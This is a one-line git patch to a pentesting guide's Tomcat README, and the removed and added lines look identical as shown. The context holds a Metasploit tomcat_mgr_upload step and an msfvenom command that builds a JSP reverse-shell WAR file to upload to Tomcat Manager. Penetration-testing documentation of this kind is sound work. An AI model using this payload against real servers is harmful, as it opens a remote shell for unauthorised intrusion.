From 60d09e18e3ca27d63ed40296e724ef8a201dcd78 Mon Sep 17 00:00:00 2001 From: Martin Zaarour <107635472+Mazaar@users.noreply.github.com> Date: Tue, 5 Nov 2024 13:12:49 +0100 Subject: [PATCH] Update README.md --- network-services-pentesting/pentesting-web/tomcat/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md index 47938c7b3..dc47450f4 100644 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -156,7 +156,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit 1. Create the war to deploy: ```bash -msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` 2. Upload the `revshell.war` file and access to it (`/revshell/`):